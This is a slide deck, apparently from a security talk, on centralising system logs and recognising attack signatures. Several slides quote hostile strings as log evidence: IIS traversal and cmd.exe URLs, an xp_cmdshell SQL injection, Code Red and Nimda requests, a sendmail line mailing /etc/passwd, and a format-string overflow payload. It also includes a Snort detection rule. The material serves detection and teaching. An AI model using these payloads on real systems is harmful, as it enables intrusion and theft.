Logging: Make Your Life Easier

Dr. Tina Birdtbird@precision-guesswork.com

Last modified: Apr 19, 2023

Goals

• Using system & application logs to improve security and reliability on your network

• Building a logging infrastructure that works• Rapid detection of events that are usually

bad news

Agenda

• Figuring out where to start• Centralizing your log data• Parsing system logs• Attack signatures• Common mistakes

Just starting out?

• What do you need to know? Start small. Pick one or two apps or types of devices.

• What kinds of events indicate security problems, performance issues or administrative changes?

• Are your favorite events recorded by the default logging configuration on your device?

Always watch for…

• Hardware failures• Resource exhaustion• Reboots/restarts• Patches or changes to system code

or firmware or app software (upgrades or downgrades)

• Failed logins, esp to admin accounts

UNIX Login Attempts

Sep 12 10:17:11 kuspy PAM_pwdb[17529]: authentication failure; (uid=0) -> tbird for ssh service

Sep 12 10:17:12 kuspy sshd[17529]: log: Password authentication for tbird accepted.

Failed Logon to Win2k Domain

<132>EvntSLog:6388: [AUF] Wed Oct 10 10:57:15 2001: OSMOSIS/Security (675) - "Pre-authentication failed: User Name: Administrator User ID: %{S-1-5-21-776561741-2052111302-1417001333-500} Service Name: krbtgt/LAB Pre-Authentication Type: 0x2 Failure Code: 0x18 Client Address: 127.0.0.1 "

<132>EvntSLog:6389: [AUF] Wed Oct 10 10:57:15 2001: OSMOSIS/Security (529) - "Logon Failure: Reason: Unknown user name or bad password User Name: Administrator Domain: LAB Logon Type: 2 Logon Process: User32 Authentication Package: Negotiate Workstation Name: OSMOSIS"

UNIX System Boot

Jul 8 01:46:52 evileye unix: SunOS Release 5.7 Version Generic_106541-04

[UNIX(R) System V Release 4.0]

Windows System Reboot

Windows System Reboot cont.

Cisco IOS restart*Mar 1 00:00:24.716 UTC: %SYS-5-RESTART: System restarted –

Cisco Internetwork Operating System Software IOS (tm) C3500XL Software (C3500XL-C3H2S-M), Version 12.0(5.4)WC(1), MAINTENANCE INTERIM SOFTWARE

Copyright (c) 1986-2001 by cisco Systems, Inc.

Compiled Tue 10-Jul-01 12:32 by devgoyal

Always watch for:

• Creation of new accounts, esp those that “look like” system accounts, or have admin privileges

Creating New User – WinNT

<133>EvntSLog:423: [AUS] Fri Oct 05 11:59:09 2001: HANDCUFFS/Security (624) - "User Account Created: New Account Name: tbird New Domain: HANDCUFFS New Account ID: S-1-5-21-1647595427-22557637-1039276024-1001 Caller User Name: Administrator Caller Domain: HANDCUFFS Caller Logon ID: (0x0,0x2B79) Privileges - "

Creating New User – WinNT cont.

<133>EvntSLog:424: [AUS] Fri Oct 05 11:59:09 2001: HANDCUFFS/Security (626) - "User Account Enabled: Target Account Name: tbird Target Domain: HANDCUFFS Target Account ID: S-1-5-21-1647595427-22557637-1039276024-1001 Caller User Name: Administrator Caller Domain: HANDCUFFS Caller Logon ID: (0x0,0x2B79) "

<133>EvntSLog:425: [AUS] Fri Oct 05 11:59:09 2001: HANDCUFFS/Security (628) - "User Account password set: Target Account Name: tbird Target Domain: HANDCUFFS Target Account ID: S-1-5-21-1647595427-22557637-1039276024-1001 Caller User Name: Administrator Caller Domain: HANDCUFFS Caller Logon ID: (0x0,0x2B79) "

Monitoring Routers

• User entering enable mode• Access control list changes• Enable/disable/reconfigure interfaces• Firmware

downgraded/upgraded/patched• Conditions that produce Traceback

errors• rsh, rcp connection attempts

Config Change on Cisco IOS

%SYS-5-CONFIG: Configured from host1-config by rcp from 172.16.101.101

root or Admin access

Sep 12 12:21:58 kuspy PAM_pwdb[17904]: (su) session opened for user root by tbird(uid=501)

Monitoring Firewalls

• Host OS messages as applicable• Configuration changes• Adds/deletes/changes of admin

accounts• Administrative traffic from

“unexpected” locations (like the Internet)

• Connection logs (start/stop/amt of data)

FireWall-1 to loghost

• Need to record operating system events, firewall policy configuration changes, network connection logs for thorough monitoring

• Assumes UNIX host for FW-1• Operating system events: standard

syslog configuration for the host OS

FireWall-1 to loghost cont.

• Firewall policy changes:– command line loads are recorded by

syslog– loads, changes created via GUI tool

are recorded in $FWDIR/log/cpmgmt.aud

– as root, start /bin/sh and type/bin/tail -f $FWDIR/log/cpmgmt.aud | /bin/logger -p local6.info > /dev/null 2>&1 &

FireWall-1 to loghost cont.

FireWall-1 to loghost cont.

• Firewall network connection logs:– connection logs are stored in

Checkpoint proprietary binary format– as root, start /bin/sh and type$FWDIR/bin/fw log -tf | /bin/logger -p local5.info

• Watch the log size!

ACL changes

Sep 12 12:13:39 2000 f_cf a_acladm t_acl_change p_major pid: 21734 ruid: 0 euid: 0 pgid: 21734 fid: 1021694 cmd: 'cf‘ domain: Admn edomain: Admn acl_admin: tbird acl_op: modify acl_table: acl acl_data: {'ignore': 0, 'name': 'ssh_ext_soc'}

Firewall Rulesets & Logs

• Most firewalls log connection requests and results using a rule’s number (position in ruleset) or name

• Usually don’t log set of rules to system log

• Have to manually correlate against ruleset, or record ruleset in system logs

Monitoring Database Servers

• Interactive DB access rather than scheduled jobs or automated processing

• Access control changes (DBA granting themselves or other DBAs higher level of access to system)

• DB account access over network• Automated reporting of network

component versions

Monitoring Database Servers cont.

• Changes to scripts on DB servers• Presence (?) and use of non-

interactive DB accounts

File system full

set /kernel: pid 801 (mysqld), uid 88 on /var: file system full

Monitoring Web Servers

• Host OS messages• Malicious signatures in access logs

(artificial ignorance/content inspection)• New virtual hosts added• New listening ports or virtual IPs added• Unusual increase in inbound or

outbound traffic (Nimda, anyone?)

Monitoring Web Servers cont.

• New scripts• New modules• New content• Parent or child processes dying

with unexpected errors• Web server action resulting from

client request (i.e. how did that URL map to file system?)

MS IIS to loghost

• Variety of attacks target IIS; Web servers usually the first target of malicious activity

• Web logs difficult to integrate into central monitoring system: performance issues, no native utility that writes IIS logs to Event Log

IIS workflow

• Decode incoming client connection request

• Determine proper virtual web server

• Determine proper document root• Call handler for data requested by

client

How does IIS write logfiles?

• Data written block by block (64kb) rather than line by line – unused space is filled with zeros rather than left uninitialized

• Merely monitoring IIS logs for changes in file sizes can be misleading!

• Log files get smaller when IIS is stopped because zeros are deleted – not because an attacker is deleting data!

Requirements for Web Logs

• Must be forwarded to central log server in close to real-time, with or without local processing

• Forwarding mechanism must not degrade performance of Web server significantly

• Note that syslog specifies packet max size of 1024 bytes – watch URL length

Attacks on IIS

• Remote access to Windows Shell:http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:\

• Download the Windows password DB:

[drive-letter]:\winnt\repair\sam._

Attacks on IIS cont.

• Inappropriate access to server info:http://host/index.asp?something=..\..\..\..\WINNT\system32\cmd.exe?/c+DIR+e:\WINNT\*.txt

• SQL injection attack on MS-SQL:http://host/cgi-bin/lame.asp?name=john`;EXEC master.dbo.xp_cmdshell'cmd.exe dir c:'--

Code Red

128.101.47.28 - - [28/Sep/2001:00:43:43 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 284 "-" "-"

Centralizing Your Logs

• Why?– easier to archive– easier to correlate– log preservation if host is attacked

• Homogeneous or mixed?• Homogeneous: lucky you

– Built in mechanisms• Mixed

Centralizing Your Logs cont.

• Mixed environment• syslog may not be a good choice

– security– reliability

• syslog may be the only choice– most supported logging mechanism

• So it’s clearly the best choice!

syslogd

• Consolidated audit mechanism for UNIX kernel and application messages

• Gives application and OS developers a consistent interface for reporting significant events

• Allows local or remote storage of messages

syslogd cont.

• /etc/syslog.conf controls how much data is generated, and where it is stored

• syslog.conf format:selector <Tab> action• selectors indicate what’s sending

the message, and what criticality the message has

syslogd cont.

• facility – the application or system component that generates a log message

• user – default facility applied if nothing else is specified when message is written

• mark – inserts a timestamp into log data at regular intervals (useful for validating time synchronization, system performance)

syslogd cont.

• level – the severity of a message on the computer generating it, i.e.

• emerg – system is or will be unusable if situation is not resolved (most severe)

• alert – immediate action required• notice –a significant but typically

normal event that may merit investigation

• Assigned by the developer who implemented the logging

syslogd cont.

• action – what’s done with a message once it’s received from a facility

• actions usually represent destinations – message is written to a local file, a syslog daemon on another system, the system console, or a user console

syslogd Historical Oddities

• Many syslogds require <Tab> as delimiter, not whitespace, & die gory, unpleasant, hard-to-detect deaths if <Tab>s are not present

• Fixed in SDSC-syslog, syslog-ng, sysklogd, some OS implementations (FreeBSD)

Audit Caveats

• syslog only records what you’ve told it to record

• Vast majority of events on a system are not recorded – events must generate logs to show up in log monitoring

• Failed attacks often leave tracks; successful attacks are often only recorded indirectly

Audit Caveats cont.

• Running automated attack tools (nessus, CyberCop Scanner) against base operating systems – 15% of all probes logged by OS or application mechanisms, but at least record genuine system activity

• IDS, other network alarms really help to identify when further examination is warranted

syslogd Issues

• No default limitations on data sources (users or processes), so all log data is inherently unreliable

• Nothing to prevent forged data from being inserted into data stream

• Limited number of actions possible on receipt of a particular message

syslogd Replacements

• Improved ability to filter and redirect inbound log messages

• Integrity checks on locally-stored logfiles

• Store more information about log data and events

• Fix that whole <Tab> problem• Retain compatibility with classic syslog

syslogd Replacements cont.

• syslog-ng: most popular replacement; allows forwarding over TCP; remembers forwarding addresses; more granular message filtering

• modular syslog: a syslog replacement that includes data integrity checks, easy database integration, and output redirection using regular expressions

Real-World Secure Transmission

• SDSC-syslog implements syslog-sign and syslog-reliable

• nsyslog – TCP over SSL• Tunnelling over SSH or SSL

Client: netcat -l -u -p syslog | netcat localhost 9999

loghost: netcat -l -p 9999 | netcat localhost -u syslog

• Serial cables

Windows Event Log

• Windows analog of syslog• No integrated capability for

remote logging• Binary file – no grep!• System default – auditing is

disabled

Windows Event Log cont.

• System Log: Startup and shutdown messages, system component data, critical services

• Security Log: Windows auditing system data only, including user & host auth, share access, printing, other

• Application Log: Nearly everything else

Windows Event Log cont.

• Any process can write to Application and System Event Logs – “should” register message library

• Only LSA and Event Log Service itself can write to Security Event Log

• Security log is more reliable forensic information than off the shelf syslog

Windows Application Log

• Application Log messages parsed via message dictionary

• Should be provided by application developer

• Frequently isn’t

Windows Application Log cont.

Windows Event Log cont.

Windows Event Log cont.

Windows Event Log cont.

Windows to loghost

• Third-party tools required to send Event Log data to remote loghost

• Pure syslog clients:– http://www.eventreporter.com– BackLog

http://www.intersectalliance.com/projects

– http://www.sabernet.net/software/ntsyslog.html

Windows to loghost cont.

• Other options: Perl module Win32::EventLog – allows external access to EventLog API

• Discussion based on inexpensive third-party tool, EventReporter

Windows Audit Policy

Windows to loghost cont.

Windows to loghost cont.

Windows to loghost cont.

Windows to loghost cont.

What to do with all that data

• Automate rapid sorting of data into “must respond now” and “ought to process later” categories

• Or, what to do with all the stuff you get when you configure your devices to tell you what you need to know

A Note on Log Reduction

• Most tools use regular expressions (of varying complexity) to divide logs into “discard” and “investigate”

• Size of logs also reduced by fixing problems: minor configuration errors & hardware glitches that don’t disrupt service but can be resolved

Log Analysis Tools

• Some syslog collectors (like syslog-ng) offer sophisticated parsing mechanisms for real-line processing as data is received

• Some analysis tools with the ability to handle real-time data streams can be used as collectors

but….

Log Analysis Tools cont.

• In practice want to separate the collecting and analyzing capacities even if you use the same code– archive raw data for future processing– both tasks can be extremely resource

intensive, so separating them provides better scalability

Artificial Ignorance

• Eliminate log data that indicates normal, allowed behavior, and focus your energy on the residue

• checksyslog automates removal of “nominal status” messages once you know what they are

Artificial Ignorance cont.

• Regular expressions describing nominal behavior:

in.telnetd\[\d+\]: connect from (friendly\.org|pc2\.foo\.edu)

postfix/smtpd\[\d+\]: reject: RCPT from.*.Sender address rejected: Domain not found

Build a Quick & Dirty Ignore List

cut -f5- -d\ all.log.0 | sort | uniq -c |sort -nr > uniq.sorted.freq

logsurfer

• Multi-line log event processor• Maintains context messages &

situations• Includes timeouts and resource

limits• Can change monitoring behavior if

situation requires

logsurfer cont.

Configuration issues:• Severe system impact possible if

external programs (like sendmail) are called in response to events

• Regular expressions must be “good enough”– too general matches irrelevant messages– too specific misses messages that should

be matched

logsurfer cont.

# rpcbind #--------------------------------------

' rpcbind: refused connect from ([^ ]*)' ' connect from [^]*.local.net|localhost)' - - 0 CONTINUE open "^.{19,}$2" - 4000 86400 0 ignore

' ([^ .]*)(.local.net|) rpcbind: refused connect from ([^ ]*) ' - - - 0 CONTINUE rule before " rpcbind: refused connect from $4" - - - 300 ignore

' ([^ .]*)(.local.net|) rpcbind: refused connect from ([^ ]*) ' - - - 0 exec "/usr/local/sbin/safe_finger @4 | /usr/local/sbin/start-mail logsurfer \"$2: rpcbind: (backtrack)\""

Baselining

What’s normal?• How many apps/facilities/systems

report to loghost?• How many distinct messages from

each facility?• Top ten most frequent and “top”

ten least frequent are a good place to start

Baselining cont.

• Amount of network traffic per protocol: total HTTP, email, FTP etc.

• Logins/logoffs, access of admin accounts

• DHCP address management, DNS requests

• total amount of log data per hour/day• number of processes running at any

time

Thresholding

• Once you’ve baselined, what’s weird? • Conditions: given a line of data,

– notify based on the presence of a second line

– the absence of a second line– number of times that event happens in a

given time period• Or notify when a message doesn’t

appear!

Most common logging mistakes

• Not ever looking at the logs• Not thinking about what sorts of

system events you’d like to monitor, before you need to find them

• Monitoring firewall and/or IDS logs but not database or Web server logs (that is, watching perimeter security systems but not the ultimate victims of attacks)

Most common logging mistakes cont.

• Deciding on logging software, analysis software, rotation schedule, archiving system before you’ve determined what sorts of data to collect, how long to store it, how much you’ll get

• Getting into any conversation on data transfer protocols or XML formatting

Application & OS Attack Signatures

CERT Advisory CA-2003-07

• Buffer overflow in header processing in sendmail

• Announced 3 March 2003• Patched systems will log

Dropped invalid comments from header address

CERT CA-2003-07 cont.

Mar 11 00:33:53 victim sendmail[313]: h2B5Xmm00313: SYSERR: putoutmsg (attacker): error on output channel sending "503 5.0.0 Need MAIL before RCPT": Broken pipe

Mar 11 00:33:53 victim sendmail[317]: h2B5Xrm00316: Dropped invalid comments from header address

Mar 11 00:33:53 victim sendmail[317]: h2B5Xrm00316: SYSERR(root): Infinite loop in ruleset canonify, rule 16

Slapper: Linux/SSL worm

• Apache/mod-SSL worm discovered 13 Sept 2002; exploits buffer overflow in SSL v2

[error] SSL handshake failed: HTTP spoken on HTTPS port; trying to send HTML error page

[error] OpenSSL: error:1407609C:SSL routines:SSL23_GET_CLIENT_HELLO:

http request [Hint: speaking HTTP to HTTPS port!?]

Apache Chunked Encoding Vuln

• FreeBSD worm detected in the wild 28 June 2002:

[Sat Jun 29 15:06:40 2002] [notice] child pid 21452 exit signal Segmentation Fault (11)

[Sat Jun 29 15:06:41 2002] [error] [client 172.16.159.57] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /

CERT Advisory CA-2002-03

• Numerous vulnerabilities in SNMP implementations

• Denial of service in all vulnerable systems

• Buffer overflow/root compromise in some vulnerable systems

• PROTOS test suite publicly available

Detecting Use of PROTOS

• Preliminary results for Solaris snmpdx:• One of the test packets DoSes

daemon• Next test case generates syslog msg:

Feb 12 23:25:48 mordor snmpdx: agent snmpd not responding

PROTOS vs. Solaris SNMP

Feb 15 02:06:45 mordor snmpdx: error while receiving a pdu from testmachine.lab.fakename.com.60347: The message has a wrong version (8355711)

Feb 15 02:08:58 mordor snmpdx: SNMP error (UNKNOWN! (65793), 0) sent back to testmachine.lab.fakename.com.61021

PROTOS signatures: Snort

alert udp $EXTERNAL_NET any -> $HOME_NET 161 (msg:"Attack using PROTOS Test-Suite-req-app"; content: "|30 26 02 01 00 04 06 70 75 62 6C 69 63 A0 19 02 01 00 02 01 00 02 01 00 30 0E 30 0C 06 08 2B 06 01 02 01 01 05 00 05 00|";)

sendmail Exploits

Jul 21 01:25:49 ariel sendmail[308]: BAA00307: to=lamarbroc@delphi.com, ctladdr=":/bin/mail root@ariel.sdsc.edu </etc/passwd", delay=00:00:34, mailer=smtp, relay=bos1h.delphi.com. (192.80.63.8), stat=Sent (Ok.)

Jul 21 01:35:40 ariel sendmail[545]: setsender: "/bin/mail root@ariel.sdsc.edu </etc/passwd": invalid or unparseable, received from [205.133.101.5]

Jul 21 13:13:04 ariel sendmail[784]: NAA00783: to=\tsutomu, ctladdr=tsutomu@ariel.sdsc.edu, delay=00:03:09, mailer=local, stat=Sent

Nimda: Worm Sign

204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"

204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"

204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"

204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe? /c+dir HTTP/1.0" 404 - "-" "-"

Nimda: Worm Sign cont.

204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET /scripts/..%%35%63../winnt/system32

/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"

204.120.69.195 - - [18/Sep/2001:09:35:22 -0500] "GET /scripts/..%%35c../winnt/system32

/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"

204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET /scripts/..%25%35%63../winnt/system3/

cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-“

204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET /scripts/..%25%35%63../winnt/system32

/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"

Hacked via FTPSep 23 17:31:55 www inetd[1638]: pid 28592: exit

status 1

Sep 23 17:33:20 www ftpd[28594]: FTP LOGIN REFUSED (ftp in /etc/ftpusers) FROM 203.55.23.150 [203.55.23.150], ftp

Sep 23 17:33:47 www ftpd[28595]: FTP LOGIN REFUSED (ftp in /etc/ftpusers) FROM 203.55.23.150 [203.55.23.150], ftp

Sep 23 17:33:58 www inetd[1638]: pid 28596: exit status 1

Sep 23 17:52:38 www useradd[28609]: new user: name=jogja, uid=506, gid=10, home=/etc/jogja, shell=/bin/bash

Hacked via FTP cont.

Sep 23 17:55:34 www PAM_pwdb[28610]: password for (jogja/506) changed by ((null)/0)

Sep 23 17:58:03 www PAM_pwdb[28612]: check pass; user unknown

Sep 23 17:58:04 www login[28612]: FAILED LOGIN 1 FROM 202.155.35.132 FOR ku ^H^H^H^H, User not known to the underlying authentication module

Sep 23 17:58:11 www PAM_pwdb[28612]: authentication failure; (uid=0) -> jogja for login service

Sep 23 17:58:12 www login[28612]: FAILED LOGIN 2 FROM 202.155.35.132 FOR jogja, Authentication failure

Why IDS isn’t Enough

Jan 2 16:19:23 yyy.yyy.yyy.yyy snort[1260]: RPC Info Query: 216.216.74.2:963 -> xxx.xxx.xxx.xxx:111

Jan 2 16:19:31 yyy.yyy.yyy.yyy snort[1260]: spp_portscan: portscan status from 216.216.74.2: 2 connections across 1 hosts: TCP(2), UDP(0)

Buffer OverflowsJan 02 16:19:45 xxx.xxx.xxx.xxx rpc.statd[351]: gethostbyname

error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿bffff750 804971090909090687465676274736f6d616e797265206520726f7220726f66 bffff718 bffff719 bffff71a bffff71b!

!

Buffer Overflown?

Jan 02 16:20:25 xxx.xxx.xxx.xxx adduser[12152]: new user: name=cgi, uid=0, gid=0, home=/home/cgi, shell=/bin/bash

Jan 02 16:22:02 xxx.xxx.xxx.xxx PAM_pwdb[12154]: password for (cgi/0) changed by ((null)/0)

SSH CRC-32 Attack

sshd[6169]: fatal: Local: Corrupted check bytes on input.

sshd[6253]: fatal: Local: crc32 compensation attack: network attack detected

cachefsd Buffer Overflow

May 16 22:46:08 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped

May 16 22:46:22 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped

May 16 22:47:09 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Hangup

What’s Interesting? cont.

Jun 26 16:48:11 grolsch rpc.statd[382]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

What does it take?

The common item to look for when reviewing log files is anything that appears out of the ordinary.

CERT Coordination Center Intrusion Detection Checklist